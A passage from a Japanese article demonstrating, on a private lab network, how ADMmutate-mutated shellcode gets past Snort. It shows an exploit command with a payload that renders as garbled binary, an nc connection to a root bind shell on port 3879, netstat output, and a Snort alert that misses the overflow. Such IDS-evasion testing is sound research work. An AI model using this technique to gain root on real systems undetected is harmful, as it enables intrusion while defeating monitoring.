ADMmutateを利用したアタック |
次に同様のアタックを、ADMmutateを利用して行ってみよう(192.168.1.10 → 192.168.1.4)。
# ./exp-adm 192.168.1.4 2600 T麓沺担]Q[[・FM_・A・・BH姆彎@H店俯4?副・D擢'7T媛楠0廝沽C辨[O/E_送HJKG・P伝QK'NW 肋GFMJ選NZ廸・^・廨?E儺??弭UH?挈鰥オ[勇A[K杞W俸@7CZEMKX廢/X杁@`与賎OGEO李幗H善U 憂誘・WC飮T炭7'荘KPW浪ZTLIS・CGY_N^LUDL_芳X?I祐AA傍UO婉VLS覧M朿DH][/@・'朶I'JF[J ]霊沫VTM?77L俣Y彁・GZRHO@XTLN`7C・・FM・MPY輿顛IX・A乏弸JX兩@/弖廡弉CP?R7U宅QF 封_有G狼I[・覧辿T蘖XV釘RZA壞ィR/覧]/邦H邸TT]@Z_弯LノハH苧S・悍ィ/U轍MP__梺'俣^ 輿騒LT滔8LTTLHEYレ[戴ォ@G_J'Z檻P狼ツFLカWU佑_`]M[雄梨・柚纏/F櫂VD廳7GT/GAXS`[乏T 'йイEB」MC璃XNZ[チ`Z^'Q祐@モMPLPC兢7CC漸K將LQQ[ョF・F@``ソ@・XL/WNGUFPU[AH[・M 悠MUルFG霸C逼C@・辿IJ^?L卵廾X_]DF橄1・]Z]R・IJ葡_B労KK[IウO7B'弭善`]庭笵VRG[悄I 朿肘W・E迭VIEPR]C^GG芳忙LFJ遭ソHVG媚鋳FNZ・[E?/狙DヨQU邑G霊>SUFN短@・宅=庭0K弼 屁H7Z`W謬ア@噌JPL檻K聾鱈ナ@O''FT/'XPOJR適姆_WR??ホ]]亡Q禅T]・N薦@H櫑R嫋A@UTGHV糖 [MT'疋ョX飮I`転/探I棊W檻猷・・Z[UG噌HBGLJ篭添NP霸瓢JFLQIOムF@汳nc箔 *盃O,椶・ ・祠蓚j約抛・栫p縊n樣q 庭先・ 帝栫|cR,・ 約抛uT・%・・溶E函S採般,忍K%・・b鏃e氈 ,R 贍∪ 臧唏抛nF舳隔闃d壌U莓・莓・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・慎麓沺担]Q[[・FM_・A・・BH姆彎@H店俯4?副・D 擢'7T媛楠0廝沽C辨[O/E_送HJKG・P伝QK'NW肋GFMJ選NZ廸・^・廨?E儺??弭UH?挈鰥オ[勇A[K 杞W俸@7CZEMKX廢/X杁@`与賎OGEO李幗H善U憂誘・WC飮T炭7'荘KPW浪ZTLIS・CGY_N^LUDL_芳X ?I祐AA傍UO婉VLS覧M朿DH][/@・'朶I'JF[J]霊沫VTM?77L俣Y彁・GZRHO@XTLN`7C・・FM・MPY 輿顛IX・A乏弸JX兩@/弖廡弉CP?R7U宅QF封_有G狼I[・覧辿T蘖XV釘RZA壞ィR/覧]/邦H邸TT ]@Z_弯LノハH苧S・悍ィ/U轍MP__梺'俣^輿騒LT滔8LTTLHEYレ[戴ォ@G_J'Z檻P狼ツFLカWU 佑_`]M[雄梨・柚纏/F櫂VD廳7GT/GAXS`[乏T'йイEB」MC璃XNZ[チ`Z^'Q祐@モMPLPC兢7CC漸K 將LQQ[ョF・F@``ソ@・XL/WNGUFPU[AH[・M悠MUルFG霸C逼C@・辿IJ^?L卵廾X_]DF橄1・]Z]R ・IJ葡_B労KK[IウO7B'弭善`]庭笵VRG[悄I朿肘W・E迭VIEPR]C^GG芳忙LFJ遭ソHVG媚鋳FNZ ・[E?/狙DヨQU邑G霊>SUFN短@・宅=庭0K弼屁H7Z`W謬ア@噌JPL檻K聾鱈ナ@O''FT/'XPOJR適姆 _WR??ホ]]亡Q禅T]・N薦@H櫑R嫋A@UTGHV賍^@・5倹f・・・1随j#fY1ン5?ヴシ法末@飽狙I凵E ンE・・珸帚スnc箔*盃O,椶・・祠粡j約抛・栫p縊n樣q 庭先・ 帝栫|cR,・ 約抛uT・% ・・溶E函S採般,忍K%・・b鏃e氈 ,R贍∪ 臧唏抛nF舳隔闃d壌U莓・莓・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・ p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・p・深 |
では、アタックが成功したかを確認する。
# nc 192.168.1.4 3879 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10 (wheel) |
先ほどと同様にアタックが成功し、ポート3879で/bin/shが動作していることが確認できる。サーバ側でもnetstatコマンドで確認してみる。
# netstat -an | grep3879 tcp00 0.0.0.0:38790.0.0.0:* LISTEN |
これでアタックは成功した。同様にSnortのログで、攻撃が検知されているか確認してみよう。すると、netcatコマンドを実行した際のログは検出されているが、アタックそのものの検出はされておらず、Snortの検出を逃れてアタックに成功したことがわかる。
アラートログ
08/17-15:27:58.490734[**] [1:498:3] ATTACK RESPONSES id check returned root [* *] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:32809 |
今回は、例としてのサンプルアプリケーションを利用した検証ではあるが、ADMmutateを用いた攻撃により、Snortでのバッファーオーバーフォロー攻撃検出を回避し、アタックに成功してしまうことが分かる。
3/5 |